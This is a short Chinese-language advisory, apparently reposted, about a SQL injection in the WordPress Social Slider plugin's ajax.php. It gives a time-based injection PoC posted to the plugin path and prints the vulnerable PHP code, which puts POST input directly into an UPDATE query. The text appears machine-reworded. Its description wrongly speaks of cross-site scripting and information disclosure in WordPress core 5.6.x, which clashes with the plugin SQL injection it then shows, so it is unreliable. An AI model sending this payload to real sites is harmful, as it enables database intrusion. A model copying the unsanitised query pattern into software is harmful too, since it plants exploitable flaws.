破绽描绘

WordPress 容易呈现多个破绽，包括跨站脚本和信息泄露破绽。应用这些问题可能允许攻击者在受影响站点的上下文中在毫无戒心的用户的阅读器中执行恣意脚本代码，从而允许攻击者窃取基于 cookie 的身份考证凭据，或获取可能有助于其他攻击的潜在敏感信息. 从 5.6 到（包括）5.6.4 的 WordPress 版本 5.6.x 易受攻击。
 

影响版本

WordPress Social Slider 5.6到5.6.4
 

破绽复现

PoC (POST data)
—————

http://www.site.com/wp-content/plugins/social-slider-2/ajax.php

 action=ZapiszPozycje&rA[]=1 AND SLEEP(5)

易受攻击的代码

<?php

require_once(dirname(__FILE__).'/../../../wp-config.php');

global $wpdb, $table_prefix;



$SocialSliderArray = $_POST['rA'];



if (mysql_real_escape_string($_POST['action']) == "ZapiszPozycje")

    {

    $lC = 1;

    foreach ($SocialSliderArray as $recordIDValue)

        {

        $query = "UPDATE ".$table_prefix."socialslider SET lp = ".$lC." WHERE id = ".$recordIDValue;

        mysql_query($query);

        $lC = $lC + 1;    

        }

    }

?> 

感谢您的来访，获取更多精彩文章请收藏本站。